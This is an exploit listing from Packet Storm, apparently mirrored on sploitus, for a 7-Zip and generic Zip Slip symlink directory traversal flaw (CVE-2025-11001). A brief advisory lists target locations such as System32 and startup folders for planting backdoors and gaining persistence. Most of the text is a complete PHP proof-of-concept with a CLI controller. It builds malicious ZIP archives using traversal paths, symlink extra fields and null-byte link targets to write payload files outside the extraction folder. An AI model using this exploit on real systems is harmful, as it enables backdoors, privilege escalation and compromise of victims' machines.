Share
## https://sploitus.com/exploit?id=PACKETSTORM:212101
=============================================================================================================================================
    | # Title     : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.7-zip.org/                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001 
    
    [+] Summary :
    
    Multiple archive extraction implementations, including 7‑Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
    An attacker can craft a malicious ZIP archive containing:
    
    Directory traversal sequences (../../../)
    
    Symlink entries
    
    Manipulated extra fields
    
    Null‑byte terminated link targets
    
    This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
    
    [+] Vulnerability Class :
    
    Directory Traversal
    
    Arbitrary File Write
    
    Symlink Path Injection
    
    Null-byte truncation bug
    
    [+]  Affected Software :
    
    7‑Zip < 25.00 (Administrator-only exploitation on Windows)
    
    Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
    
    Applications that use ZipArchive without proper sanitization
    
    [+] Impact
    
    A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
    
    C:\Windows\System32\
    C:\ProgramData\Microsoft\Windows\Start Menu\
    /etc/
    /var/www/html/
    
    
    [+] Possible consequences:
    
        Backdoor planting
    
        Privilege escalation
    
        Persistence via startup folders
    
        Overwriting sensitive files
    
        Gaining remote execution depending on file location created
    
    [+] Technical Details
    
    [+] Core Exploit Mechanism
    
    The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
    
    or a symlink entry:  evil.lnk  β†’  ../../../../Users/Public/Documents\0
    
    These paths bypass validators in 7‑Zip and other ZIP extractors when running with elevated privileges.
    
    poc
    
    <?php
    /*
    ===========================================================
       By Indoushka (Nekaa Salah eddine)
    ===========================================================
    */
    
    /* ===========================================================
       MODE 1 β€” Basic Zip Slip Exploit
       (Former: build_zip duplicated 4 times)
    =========================================================== */
    function poc_zip_slip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
    
        $payload_name = basename($payload_file);
        $payload_data = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $zip = new ZipArchive();
        if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
            die("[-] Failed to create ZIP\n");
        }
    
        $zip->addFromString($traversal . $payload_name, $payload_data);
        $zip->close();
    
        echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 2 β€” Manual Symlink ZIP Creator
    =========================================================== */
    function poc_symlink_zip($target_path, $output_zip)
    {
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $name = "evil.lnk";
        $link = $traversal . "\x00";
    
        $extra  = pack("v", 0x756e);
        $extra .= pack("v", strlen($link));
        $extra .= $link;
    
        $local = pack("VvvvvvVVVvv",
            0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
            strlen($name), strlen($extra)
        );
    
        file_put_contents($output_zip, $local . $name . $extra);
    
        echo "[+] PoC: Symlink ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 3 β€” Full Manual ZIP Builder (Symlink + Payload)
    =========================================================== */
    function poc_manual_zip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
    
        $payload_name  = basename($payload_file);
        $payload_data  = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $trav   = "../../../../" . $target;
    
        $ln_name   = "evil.lnk";
        $ln_target = $trav . "\x00";
        $ln_extra  = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
    
        $f = fopen($output_zip, "wb");
        $off = 0;
    
        // Local: Symlink
        $h1 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
        );
        fwrite($f, $h1.$ln_name.$ln_extra);
        $symlink_offset = $off;
        $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
    
        // Local: Payload
        $h2 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0
        );
        fwrite($f, $h2.$payload_name.$payload_data);
        $payload_offset = $off;
        $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
    
        // Central Directory
        $cd_start = $off;
    
        // CD: Symlink
        $cd1 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
            strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
        );
        fwrite($f, $cd1.$ln_name.$ln_extra);
    
        // CD: Payload
        $cd2 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,
            strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
        );
        fwrite($f, $cd2.$payload_name);
    
        // EOCD
        $eocd = pack("VvvvvVVv",
            0x06054b50,0,0,2,2,$off,$cd_start,0
        );
        fwrite($f, $eocd);
        fclose($f);
    
        echo "[+] PoC: Manual ZIP generated: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 4 β€” CVE‑2025‑11001 (7-Zip Directory Traversal)
    =========================================================== */
    function poc_cve_2025_11001($target, $payload, $output)
    {
        poc_manual_zip($target, $payload, $output);
    
        echo "[+] CVE-2025-11001 Archive Ready\n";
    }
    
    
    /* ===========================================================
       CLI Controller
    =========================================================== */
    
    if (php_sapi_name() == "cli")
    {
        $args = getopt("", [
            "mode:",
            "target:",
            "payload::",
            "output::"
        ]);
    
        if (!isset($args["mode"])) {
            die("Usage:\n
    php exploit.php --mode=zip-slip     --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=symlink      --target=DIR --output=out.zip
    php exploit.php --mode=manual       --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
    ");
        }
    
        $mode   = $args["mode"];
        $target = $args["target"] ?? null;
        $payload= $args["payload"] ?? null;
        $output = $args["output"] ?? "exploit.zip";
    
        switch ($mode) {
            case "zip-slip":
                poc_zip_slip($target, $payload, $output);
                break;
    
            case "symlink":
                poc_symlink_zip($target, $output);
                break;
    
            case "manual":
                poc_manual_zip($target, $payload, $output);
                break;
    
            case "cve-2025-11001":
                poc_cve_2025_11001($target, $payload, $output);
                break;
    
            default:
                echo "Unknown mode.\n";
        }
    }
    ?>
    
    
    Save as : poc.php
    
    run : php poc.php
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================